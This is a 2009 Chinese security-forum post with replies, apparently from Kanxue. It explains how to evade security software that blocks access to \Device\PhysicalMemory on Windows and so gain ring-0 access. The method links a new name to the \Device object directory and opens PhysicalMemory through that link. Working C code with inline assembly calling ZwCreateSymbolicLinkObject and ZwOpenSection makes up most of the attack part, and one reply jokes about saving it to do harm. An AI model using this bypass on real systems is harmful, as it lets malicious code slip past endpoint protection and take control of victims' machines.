[原创]续PhysicalMemory攻击-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]续PhysicalMemory攻击

发表于: 2009-7-24 02:49 15446

[原创]续PhysicalMemory攻击

qihoocom

2009-7-24 02:49

15446

续PhysicalMemory攻击

之前曾讲过通过PhysicalMemory进入RING0的一些绕过攻击方式：
http://bbs.pediy.com/showthread.php?t=89068&highlight=

其中提到的为\Device\PhysicalMemory创建符号链接的方式来绕过对ZwOpenSection打开这个Section的拦截，这个实际很多安全软件都已经防御了，例如Comodo , 卡巴，等等，但是他们仅仅是拦截对\Device\PhysicalMemory的Symbolic Link创建，这样足够吗？

答案当然是否定的。我们仔细看\Device\PhyscialMemory这个路径，实际它由\Device这个对象目录和PhysicalMemory这个Section Name组成，那么很简单了，我们创建对\Device这个对象目录的映射，例如叫123,这个不会有人拦截，然后再打开\123\PhysicalMemory, 这样就绕过了拦截，得到了物理内存对象的句柄，轻松进入RING0，具体实现代码如下：

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID pAddr = GetProcAddress(hlib , "ZwOpenSection");
PVOID pAddr2 = GetProcAddress(hlib , "ZwCreateSymbolicLinkObject");
HANDLE shandle ;
PHANDLE psechandle = &shandle ; 
LONG stat ; 
HANDLE symhandle ;
PHANDLE psymhandle = &symhandle;
OBJECT_ATTRIBUTES oba ; 
OBJECT_ATTRIBUTES oba2 ; 
UNICODE_STRING smbname = RTL_CONSTANT_STRING(L"\\Device");
UNICODE_STRING linkname = RTL_CONSTANT_STRING(L"\\??\\123");
UNICODE_STRING phname = RTL_CONSTANT_STRING(L"\\??\\123\\PhysicalMemory");

InitializeObjectAttributes(&oba2 , &linkname , 0x40 , 0 , 0);
InitializeObjectAttributes(&oba , &phname , 0x40 , 0 , 0 );
__asm
{
   lea eax ,smbname 
   push eax
   lea eax ,oba2
   push eax
   push 1
   push psymhandle
   call pAddr2
   lea eax , oba
   push eax
   push    2
   push psechandle
   call    pAddr
}

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

收藏・12

免费・8

支持

最新回复 (25) 1 2 ▶
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 2 楼额这个沙发也坐了膜拜一下 2009-7-24 03:08 0
xihuanxue 雪币： 38 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 49 粉丝 0 关注私信	xihuanxue 3 楼高手方法就是多..膜拜 2009-7-24 06:56 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 4 楼先让你打开，我只判断结果~ 2009-7-24 07:18 0
leivn 雪币： 227 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 67 粉丝 1 关注私信	leivn 5 楼太强了，无法学习，只能收藏 2009-7-24 08:43 0
qihoocom 雪币： 635 活跃值： (101) 能力值： ( LV12，RANK：420 ) 在线值：发帖 49 回帖 1165 粉丝 24 关注私信	qihoocom 9 6 楼这里讨论的是针对RING0的拦截漏洞的攻击。确实，函数调用完成后处理句柄会安全得多，但事实上绝大多数安全软件都是在函数调用前判断的。另外，函数调用完成后处理，也并非是无懈可击。这里讨论的是针对性的攻击，确实，RING0有什么不能拦截的呢，只要是能想出来的攻击方式，RING0知道了都可以有方法拦截，应用层攻击就在于RING0的程序员根本不知道有这种攻击方式~ 2009-7-24 12:15 0
kuang110 雪币： 89 活跃值： (185) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 338 粉丝 0 关注私信	kuang110 6 7 楼为什么楼主就是这么强悍呢？看不懂………………路过ing………… 2009-7-24 12:54 0
xiejienet 雪币： 142 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 639 粉丝 0 关注私信	xiejienet 8 楼路过，收集起来做坏事用，哇哈哈哈 2009-7-24 13:26 0
creakerzgz 雪币： 62 活跃值： (72) 能力值： ( LV5，RANK：70 ) 在线值：发帖 13 回帖 230 粉丝 3 关注私信	creakerzgz 1 9 楼同意 2009-7-24 14:03 0
seesth 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 40 粉丝 0 关注私信	seesth 10 楼只能收藏留在以后看了。。。 2009-7-24 16:45 0
accessory 雪币： 186 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 29 粉丝 0 关注私信	accessory 11 楼我好像从某个文章里看到说 /DEVCIE/PHYSICALMEMORY 这个接口已经禁止掉了？难道是在VISTA里？哪位大牛解说下？ 2009-7-25 00:44 0
superleft 雪币： 169 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 63 粉丝 0 关注私信	superleft 12 楼和文件的juction链接, 注册表的LINK有异曲同工之妙~ 呵呵,突出一个字"绕". 2009-7-25 12:41 0
bithaha 雪币： 1505 能力值： (RANK：210 ) 在线值：发帖 66 回帖 933 粉丝 4 关注私信	bithaha 5 13 楼坐个首页楼主这个方法妙呀 2009-7-27 22:08 0
dayang 雪币： 220 活跃值： (721) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 14 楼再次膜拜，希望大牛能发完整点的代码，有些结构都不知道在哪里定义的，菜 2009-7-28 00:04 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 15 楼 MJ的代码已经很完整了，相关结构的定义参考Native API手册或WRK~ 2009-7-28 08:32 0
HSQ 雪币： 381 活跃值： (140) 能力值： ( LV13，RANK：330 ) 在线值：发帖 36 回帖 332 粉丝 7 关注私信	HSQ 8 16 楼还是MJ细心，进R0还是防不胜防啊 2009-7-28 11:27 0
圣新冰心雪币： 59 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 78 粉丝 0 关注私信	圣新冰心 17 楼这不是MJ说过的东西么 2009-9-5 12:49 0
winnip 雪币： 145 活跃值： (85) 能力值： ( LV5，RANK：60 ) 在线值：发帖 100 回帖 902 粉丝 0 关注私信	winnip 1 18 楼抢夺ring 0.激烈哦。。。。。。。 2009-9-7 20:03 0
watsy 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	watsy 19 楼传说中的MJ牛... 2009-9-8 01:45 0
dongshan 雪币： 413 活跃值： (351) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 103 粉丝 0 关注私信	dongshan 20 楼 ring 0 情结就像处女情节样啊。 2009-9-17 21:57 0
Sovereign 雪币： 225 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 19 回帖 91 粉丝 0 关注私信	Sovereign 21 楼看过你多次发言后，觉得你肯定很NB.膜拜所有高手!! 真心话。 2009-9-17 22:13 0
sethseth 雪币： 116 活跃值： (41) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 49 粉丝 0 关注私信	sethseth 22 楼一些古老的代码又可以重新利用了 2009-9-18 13:45 0
JDF 雪币： 101 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	JDF 23 楼不错，十分佩服，学习了 2009-9-19 14:47 0
lankiny 雪币： 219 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 76 粉丝 0 关注私信	lankiny 24 楼看了有些收获，继续学习 2009-10-13 23:34 0
stackple 雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 12 粉丝 0 关注私信	stackple 25 楼太牛了你 .. 2009-12-15 20:14 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

qihoocom

发帖

1165

回帖

420

RANK

关注

私信

他的文章

[原创]让天易love俯首称臣 --- 随意PEDIY 54459

关于我们

联系我们

企业服务

看雪公众号

最新回复 (25) 1 2 ▶
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 2 楼额这个沙发也坐了膜拜一下 2009-7-24 03:08 0
xihuanxue 雪币： 38 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 49 粉丝 0 关注私信	xihuanxue 3 楼高手方法就是多..膜拜 2009-7-24 06:56 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 4 楼先让你打开，我只判断结果~ 2009-7-24 07:18 0
leivn 雪币： 227 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 67 粉丝 1 关注私信	leivn 5 楼太强了，无法学习，只能收藏 2009-7-24 08:43 0
qihoocom 雪币： 635 活跃值： (101) 能力值： ( LV12，RANK：420 ) 在线值：发帖 49 回帖 1165 粉丝 24 关注私信	qihoocom 9 6 楼这里讨论的是针对RING0的拦截漏洞的攻击。确实，函数调用完成后处理句柄会安全得多，但事实上绝大多数安全软件都是在函数调用前判断的。另外，函数调用完成后处理，也并非是无懈可击。这里讨论的是针对性的攻击，确实，RING0有什么不能拦截的呢，只要是能想出来的攻击方式，RING0知道了都可以有方法拦截，应用层攻击就在于RING0的程序员根本不知道有这种攻击方式~ 2009-7-24 12:15 0
kuang110 雪币： 89 活跃值： (185) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 338 粉丝 0 关注私信	kuang110 6 7 楼为什么楼主就是这么强悍呢？看不懂………………路过ing………… 2009-7-24 12:54 0
xiejienet 雪币： 142 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 639 粉丝 0 关注私信	xiejienet 8 楼路过，收集起来做坏事用，哇哈哈哈 2009-7-24 13:26 0
creakerzgz 雪币： 62 活跃值： (72) 能力值： ( LV5，RANK：70 ) 在线值：发帖 13 回帖 230 粉丝 3 关注私信	creakerzgz 1 9 楼同意 2009-7-24 14:03 0
seesth 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 40 粉丝 0 关注私信	seesth 10 楼只能收藏留在以后看了。。。 2009-7-24 16:45 0
accessory 雪币： 186 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 29 粉丝 0 关注私信	accessory 11 楼我好像从某个文章里看到说 /DEVCIE/PHYSICALMEMORY 这个接口已经禁止掉了？难道是在VISTA里？哪位大牛解说下？ 2009-7-25 00:44 0
superleft 雪币： 169 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 63 粉丝 0 关注私信	superleft 12 楼和文件的juction链接, 注册表的LINK有异曲同工之妙~ 呵呵,突出一个字"绕". 2009-7-25 12:41 0
bithaha 雪币： 1505 能力值： (RANK：210 ) 在线值：发帖 66 回帖 933 粉丝 4 关注私信	bithaha 5 13 楼坐个首页楼主这个方法妙呀 2009-7-27 22:08 0
dayang 雪币： 220 活跃值： (721) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 14 楼再次膜拜，希望大牛能发完整点的代码，有些结构都不知道在哪里定义的，菜 2009-7-28 00:04 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 15 楼 MJ的代码已经很完整了，相关结构的定义参考Native API手册或WRK~ 2009-7-28 08:32 0
HSQ 雪币： 381 活跃值： (140) 能力值： ( LV13，RANK：330 ) 在线值：发帖 36 回帖 332 粉丝 7 关注私信	HSQ 8 16 楼还是MJ细心，进R0还是防不胜防啊 2009-7-28 11:27 0
圣新冰心雪币： 59 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 78 粉丝 0 关注私信	圣新冰心 17 楼这不是MJ说过的东西么 2009-9-5 12:49 0
winnip 雪币： 145 活跃值： (85) 能力值： ( LV5，RANK：60 ) 在线值：发帖 100 回帖 902 粉丝 0 关注私信	winnip 1 18 楼抢夺ring 0.激烈哦。。。。。。。 2009-9-7 20:03 0
watsy 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	watsy 19 楼传说中的MJ牛... 2009-9-8 01:45 0
dongshan 雪币： 413 活跃值： (351) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 103 粉丝 0 关注私信	dongshan 20 楼 ring 0 情结就像处女情节样啊。 2009-9-17 21:57 0
Sovereign 雪币： 225 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 19 回帖 91 粉丝 0 关注私信	Sovereign 21 楼看过你多次发言后，觉得你肯定很NB.膜拜所有高手!! 真心话。 2009-9-17 22:13 0
sethseth 雪币： 116 活跃值： (41) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 49 粉丝 0 关注私信	sethseth 22 楼一些古老的代码又可以重新利用了 2009-9-18 13:45 0
JDF 雪币： 101 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	JDF 23 楼不错，十分佩服，学习了 2009-9-19 14:47 0
lankiny 雪币： 219 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 76 粉丝 0 关注私信	lankiny 24 楼看了有些收获，继续学习 2009-10-13 23:34 0
stackple 雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 12 粉丝 0 关注私信	stackple 25 楼太牛了你 .. 2009-12-15 20:14 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复